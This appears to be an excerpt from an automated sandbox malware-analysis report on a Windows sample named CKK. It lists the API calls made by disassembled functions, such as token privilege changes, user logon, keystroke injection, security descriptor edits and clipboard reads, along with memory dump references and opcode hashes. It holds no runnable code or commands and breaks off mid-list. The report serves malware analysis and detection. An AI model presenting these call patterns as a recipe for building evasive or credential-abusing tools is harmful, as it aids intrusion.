                                                                                              • Instruction Fuzzy Hash: BFE08C71A0520CEFEF25CBB88808AA977B8DB08320F104658E91AC3281D6308E40A694
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,00000000,?,00A30704,?,?,00000000), ref: 00A303B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 79756d167b1785e40f57f1a541b38463e4bfbf6ebbe94af902c47b3bda02916f
                                                                                              • Instruction ID: e91a1a5e81d315d68d245d7de8933301fd295978f56641182220e2c4ed5b83f5
                                                                                              • Opcode Fuzzy Hash: 79756d167b1785e40f57f1a541b38463e4bfbf6ebbe94af902c47b3bda02916f
                                                                                              • Instruction Fuzzy Hash: 1AD06C3204010DBBDF028F84DD46EDA3FAAFB48714F014100BE1856020C732E822AB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 001908BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_190000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                              • Instruction ID: 26a6f1c3c698ae263438eba95d7c69ba28fd61c4b9687349bb249a44303876a7
                                                                                              • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                              • Instruction Fuzzy Hash: 03D05E30E0620CABCB10CAA49804A9A73A89B08320F108754E91593280D63199409790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32 ref: 009F1CBC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoParametersSystem
                                                                                              • String ID:
                                                                                              • API String ID: 3098949447-0
                                                                                              • Opcode ID: 8616b395bdfd37aabe62197b7537252a6f70bc909770034762f0930e885a19bc
                                                                                              • Instruction ID: 2f490de09ae98b9259f9014972b2bf5d4f1b7c35d5958c78a4a927bf5414d9e6
                                                                                              • Opcode Fuzzy Hash: 8616b395bdfd37aabe62197b7537252a6f70bc909770034762f0930e885a19bc
                                                                                              • Instruction Fuzzy Hash: 92C09B353C03049FF614D7C0BC4EF117754A348B14F054001F609595E3C3F11412DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009F5773
                                                                                              • GetLastError.KERNEL32(00000002,00000000), ref: 00A676DE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 1214770103-0
                                                                                              • Opcode ID: c063d1aa3e4ea98a87261d13fbb28154b805056ce434c235f5fad910e6e4cbec
                                                                                              • Instruction ID: d1252330b843364f3a972c5e2b7506bc92471f685a636c7873477c77548e0b43
                                                                                              • Opcode Fuzzy Hash: c063d1aa3e4ea98a87261d13fbb28154b805056ce434c235f5fad910e6e4cbec
                                                                                              • Instruction Fuzzy Hash: E8818D302087059FCB14EF28C491BADB7F1BF88358F04456DF9965B2A2DB70AD45CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction ID: e028ca0476b779cd2626489eb5d22ed081a42c10320d9176236d050da73be0bd
                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction Fuzzy Hash: 7631E474A0010D9FD728CF59E491969F7B2FF49304B2486A5E809EBA95D731EDC1CBC0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(000001F4), ref: 00192341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_190000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                              • Instruction ID: b955721a6cde49eb2306d8df2a1098f1b9224b6701687e33a82b52c28653f38f
                                                                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                              • Instruction Fuzzy Hash: DFE09A7594010DAFDB00EFA4D5496AE7BB4EF04301F1005A1FD0596680DB309A548A62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(000001F4), ref: 00192341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_190000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                              • Instruction ID: c29648b1dd2abb29c3d2e8d23dce0ec52ca7f83a4c2bd17f95cac8ea96329c83
                                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                              • Instruction Fuzzy Hash: E1E0E67594010DEFDB00EFB4D5496AE7FB4FF04301F100561FD05D2280D7309E508A62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2
                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A8961A
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A8965B
                                                                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00A8969F
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A896C9
                                                                                              • SendMessageW.USER32 ref: 00A896F2
                                                                                              • GetKeyState.USER32(00000011), ref: 00A8978B
                                                                                              • GetKeyState.USER32(00000009), ref: 00A89798
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A897AE
                                                                                              • GetKeyState.USER32(00000010), ref: 00A897B8
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A897E9
                                                                                              • SendMessageW.USER32 ref: 00A89810
                                                                                              • SendMessageW.USER32(?,00001030,?,00A87E95), ref: 00A89918
                                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A8992E
                                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A89941
                                                                                              • SetCapture.USER32(?), ref: 00A8994A
                                                                                              • ClientToScreen.USER32(?,?), ref: 00A899AF
                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A899BC
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A899D6
                                                                                              • ReleaseCapture.USER32 ref: 00A899E1
                                                                                              • GetCursorPos.USER32(?), ref: 00A89A19
                                                                                              • ScreenToClient.USER32(?,?), ref: 00A89A26
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A89A80
                                                                                              • SendMessageW.USER32 ref: 00A89AAE
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A89AEB
                                                                                              • SendMessageW.USER32 ref: 00A89B1A
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A89B3B
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A89B4A
                                                                                              • GetCursorPos.USER32(?), ref: 00A89B68
                                                                                              • ScreenToClient.USER32(?,?), ref: 00A89B75
                                                                                              • GetParent.USER32(?), ref: 00A89B93
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A89BFA
                                                                                              • SendMessageW.USER32 ref: 00A89C2B
                                                                                              • ClientToScreen.USER32(?,?), ref: 00A89C84
                                                                                              • TrackPopupMenuEx.USER32 ref: 00A89CB4
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A89CDE
                                                                                              • SendMessageW.USER32 ref: 00A89D01
                                                                                              • ClientToScreen.USER32(?,?), ref: 00A89D4E
                                                                                              • TrackPopupMenuEx.USER32 ref: 00A89D82
                                                                                                • Part of subcall function 00A09944: GetWindowLongW.USER32(?,000000EB), ref: 00A09952
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A89E05
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                              • String ID: @GUI_DRAGID$F
                                                                                              • API String ID: 3429851547-4164748364
                                                                                              • Opcode ID: b384032b3ba3db5f68a6322615347a0c7b2fed267a52ec5d94ca778b366e4221
                                                                                              • Instruction ID: 3ca38039f8c9ec5f92ac94701f4a0812f2968171877d501939a2b764a3942cbc
                                                                                              • Opcode Fuzzy Hash: b384032b3ba3db5f68a6322615347a0c7b2fed267a52ec5d94ca778b366e4221
                                                                                              • Instruction Fuzzy Hash: 6D426A74204201AFDB25EF68CC44EBBBBE5FF49320F180629F699872A1E731A855CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00A848F3
                                                                                              • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00A84908
                                                                                              • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00A84927
                                                                                              • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00A8494B
                                                                                              • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00A8495C
                                                                                              • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00A8497B
                                                                                              • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00A849AE
                                                                                              • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00A849D4
                                                                                              • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00A84A0F
                                                                                              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A84A56
                                                                                              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A84A7E
                                                                                              • IsMenu.USER32(?), ref: 00A84A97
                                                                                              • GetMenuItemInfoW.USER32 ref: 00A84AF2
                                                                                              • GetMenuItemInfoW.USER32 ref: 00A84B20
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A84B94
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00A84BE3
                                                                                              • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00A84C82
                                                                                              • wsprintfW.USER32 ref: 00A84CAE
                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A84CC9
                                                                                              • GetWindowTextW.USER32 ref: 00A84CF1
                                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A84D13
                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A84D33
                                                                                              • GetWindowTextW.USER32 ref: 00A84D5A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                              • String ID: %d/%02d/%02d
                                                                                              • API String ID: 4054740463-328681919
                                                                                              • Opcode ID: 56219befacbdfb7239bef6f913b80bb02f3a30ccf3d6064cfc7f9c6bd19e3eab
                                                                                              • Instruction ID: 0a405aec395745a7a4a8363e2c97e63308a4a254f4c331a48ef5f49178a750b6
                                                                                              • Opcode Fuzzy Hash: 56219befacbdfb7239bef6f913b80bb02f3a30ccf3d6064cfc7f9c6bd19e3eab
                                                                                              • Instruction Fuzzy Hash: 8E12F37160025AABEB24AF68CC49FAE7BF8EF89710F104129F515EB2E1D7789941CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 00A0F998
                                                                                              • FindWindowW.USER32 ref: 00A4F474
                                                                                              • IsIconic.USER32(00000000), ref: 00A4F47D
                                                                                              • ShowWindow.USER32(00000000,00000009), ref: 00A4F48A
                                                                                              • SetForegroundWindow.USER32(00000000), ref: 00A4F494
                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A4F4AA
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00A4F4B1
                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A4F4BD
                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A4F4CE
                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A4F4D6
                                                                                              • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00A4F4DE
                                                                                              • SetForegroundWindow.USER32(00000000), ref: 00A4F4E1
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4F4F6
                                                                                              • keybd_event.USER32 ref: 00A4F501
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4F50B
                                                                                              • keybd_event.USER32 ref: 00A4F510
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4F519
                                                                                              • keybd_event.USER32 ref: 00A4F51E
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4F528
                                                                                              • keybd_event.USER32 ref: 00A4F52D
                                                                                              • SetForegroundWindow.USER32(00000000), ref: 00A4F530
                                                                                              • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00A4F557
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 4125248594-2988720461
                                                                                              • Opcode ID: 9ea7d5d5fdd159a066aa97f2828e0f5f3969dff58fd2910b2046fe7397e62e00
                                                                                              • Instruction ID: 20d849b550b718b9d44c3a6e3f15bcdf58e09686bbd03e47cc5f25ba9a35318b
                                                                                              • Opcode Fuzzy Hash: 9ea7d5d5fdd159a066aa97f2828e0f5f3969dff58fd2910b2046fe7397e62e00
                                                                                              • Instruction Fuzzy Hash: 9C315075A80218BEEB20ABF55C4AFBF7E6CEB84B60F101025F601E61D1D6B05901AF71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A516C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A5170D
                                                                                                • Part of subcall function 00A516C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A5173A
                                                                                                • Part of subcall function 00A516C3: GetLastError.KERNEL32 ref: 00A5174A
                                                                                              • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00A51286
                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00A512A8
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A512B9
                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A512D1
                                                                                              • GetProcessWindowStation.USER32 ref: 00A512EA
                                                                                              • SetProcessWindowStation.USER32 ref: 00A512F4
                                                                                              • OpenDesktopW.USER32 ref: 00A51310
                                                                                                • Part of subcall function 00A510BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A511FC), ref: 00A510D4
                                                                                                • Part of subcall function 00A510BF: CloseHandle.KERNEL32(?), ref: 00A510E9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                              • String ID: $default$winsta0
                                                                                              • API String ID: 22674027-1027155976
                                                                                              • Opcode ID: fc82ea6fc5f90c24bdfe214df5fe5a83fdf1d2815395e6e2c66a8f03778291a2
                                                                                              • Instruction ID: 3c293ee88df98860e6f0c09f0308f45452f6d2c18fc2137ba82ef0d2d88de236
                                                                                              • Opcode Fuzzy Hash: fc82ea6fc5f90c24bdfe214df5fe5a83fdf1d2815395e6e2c66a8f03778291a2
                                                                                              • Instruction Fuzzy Hash: FB8177B1A00209ABDF21DFA4DD49FFE7BB9FF08715F145129F911A62A0D7748A49CB20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A510F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A51114
                                                                                                • Part of subcall function 00A510F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A51120
                                                                                                • Part of subcall function 00A510F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A5112F
                                                                                                • Part of subcall function 00A510F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A51136
                                                                                                • Part of subcall function 00A510F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A5114D
                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A50BCC
                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A50C00
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00A50C17
                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00A50C51
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A50C6D
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00A50C84
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A50C8C
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00A50C93
                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A50CB4
                                                                                              • CopySid.ADVAPI32(00000000), ref: 00A50CBB
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A50CEA
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A50D0C
                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A50D1E
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A50D45
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A50D4C
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A50D55
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A50D5C
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A50D65
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A50D6C
                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00A50D78
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A50D7F
                                                                                                • Part of subcall function 00A51193: GetProcessHeap.KERNEL32(00000008,00A50BB1,?,00000000,?,00A50BB1,?), ref: 00A511A1
                                                                                                • Part of subcall function 00A51193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A50BB1,?), ref: 00A511A8
                                                                                                • Part of subcall function 00A51193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A50BB1,?), ref: 00A511B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                              • String ID:
                                                                                              • API String ID: 4175595110-0
                                                                                              • Opcode ID: 603891eb3b23a7783f25b8394d83055552d54548d899c94deac58d743562ddff
                                                                                              • Instruction ID: 8b4bf260c8f18bbde0982753e0c89ed3ece9a82f438b56ab6189cc9aba592eb2
                                                                                              • Opcode Fuzzy Hash: 603891eb3b23a7783f25b8394d83055552d54548d899c94deac58d743562ddff
                                                                                              • Instruction Fuzzy Hash: FD71497290021AABDF10DFE4EC88FEEBBB8BF05351F144615ED15A6191D771A90ACF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • OpenClipboard.USER32(00A8CC08), ref: 00A6EB29
                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00A6EB37
                                                                                              • GetClipboardData.USER32 ref: 00A6EB43
                                                                                              • CloseClipboard.USER32 ref: 00A6EB4F
                                                                                              • GlobalLock.KERNEL32 ref: 00A6EB87
                                                                                              • CloseClipboard.USER32 ref: 00A6EB91
                                                                                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00A6EBBC
                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00A6EBC9
                                                                                              • GetClipboardData.USER32 ref: 00A6EBD1
                                                                                              • GlobalLock.KERNEL32 ref: 00A6EBE2
                                                                                              • GlobalUnlock.KERNEL32(00000000,?), ref: 00A6EC22
                                                                                              • IsClipboardFormatAvailable.USER32(0000000F), ref: 00A6EC38
                                                                                              • GetClipboardData.USER32 ref: 00A6EC44
